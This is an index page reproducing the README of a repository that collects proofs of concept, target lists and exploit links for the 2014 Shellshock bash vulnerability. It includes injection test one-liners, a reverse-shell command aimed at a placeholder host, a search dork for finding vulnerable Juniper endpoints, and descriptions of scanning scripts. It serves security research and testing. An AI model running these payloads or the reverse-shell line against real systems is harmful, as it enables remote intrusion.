Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mubix/shellshocker-pocs

Collection of Proof of Concepts and Potential Targets for #ShellShocker
https://github.com/mubix/shellshocker-pocs

Last synced: 7 days ago
JSON representation

Collection of Proof of Concepts and Potential Targets for #ShellShocker

Awesome Lists containing this project

README 

        
Shellshocker - Repository of "Shellshock" Proof of Concept Code

=================



Collection of Proof of Concepts and Potential Targets for #ShellShocker



Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details



Please submit a pull request if you have more links or other resources



**Speculation:(Non-confirmed possibly vulnerable)** 



+ XMPP(ejabberd)

+ ~~Mailman~~ - [confirmed not vulnerable](http://www.mail-archive.com/mailman-users%40python.org/msg65380.html)

+ MySQL

+ NFS

+ Bind9

+ Procmail [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)

+ Exim [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)

+ Juniper Google Search`inurl:inurl:/dana-na/auth/url_default/welcome.cgi`

  + via: https://twitter.com/notsosecure/status/516132301025984512

  + via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS

+ Cisco Gear

  + via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash

+ FreePB / Asterix [patched here](http://community.freepbx.org/t/cve-2014-6271-shellshock-bash-exploit/24431)



**If you know of PoCs for any of these, please submit an issue or pull request with a link.**



## Command Line (Linux, OSX, and Windows via Cygwin)



+ [bashcheck](https://github.com/hannob/bashcheck) - script to test for the latest vulns



### CVE-2014-6271

+ `env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id`



### CVE-2014-7169

_will create a file named echo in cwd with date in it, if vulnerable_

+ `env X='() { (a)=>\' bash -c "echo date"; cat echo`



### CVE-2014-7186

+ `bash -c 'true <& /dev/tcp/REVERSESHELLIP/PORT 0>&1'`

  + (necessary to have a git account on the server)



## OSX 

+ Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb

+ Fix: http://support.apple.com/kb/DL1769



## OSX - with reverse DNS (CVE-2014-3671.txt)

+ Example zone file: [in-addr.arpa](osx-rev-ptr/in-addr.arpa.zone) that contains a CVE-2014-6271 example.

+ Example file with a getnameinfo() that passes on to setenv(): [osx-rev-ptr.c](osx-rev-ptr/osx-rev-ptr.c)

 + Advisory with description of above [CVE-2014-3671.txt ](osx-rev-ptr/CVE-2014-3671.txt)



## SIP

+ SIP Proxies: https://github.com/zaf/sipshock



## Qmail

+ Detailed walkthrough - http://marc.info/?l=qmail&m=141183309314366&w=2

+ Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392

  + http://twitpic.com/ec3615

  + http://twitpic.com/ec361o



## Postfix

+ http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt



## FTP

+ Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc

+ Metasploit Exploit Module - [Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb)



## OpenVPN

+ OpenVPN - https://news.ycombinator.com/item?id=8385332

+ PoC Walkthrough by @fj33r - http://sprunge.us/BGjP



## Oracle

+ [Alert and list of affected Products](http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html)



## TMNT

+ https://twitter.com/SynAckPwn/status/514961810320293888/photo/1



## Hand

+ Via @DJManilaIce - http://pastie.org/9601055

```

user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker

/bin/bash: X: line 1: syntax error near unexpected token `='

/bin/bash: X: line 1: `'

/bin/bash: error importing function definition for `X'

           __ __

          /  V  \ 

     _    |  |   |

    / \   |  |   |

    |  |  |  |   |

    |  |  |  |   |

    |  |__|  |   |

    |  |  \  |___|___

    |  \   |/        \ 

    |   |  |______    |

    |   |  |          |

    |   \__'   /     |

    \        \(     /

     \             /

      \|            |



```



## CUPS

+ Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code Injection](https://github.com/rapid7/metasploit-framework/pull/4050)



## IRC

+ Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb)

+ Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb)



## Scripts from @primalsec

+ `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)

+ `w3af_shocker.py` - Automates the process of running a w3af spider/shell\_shock scan (User-Agent Method)

+ `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)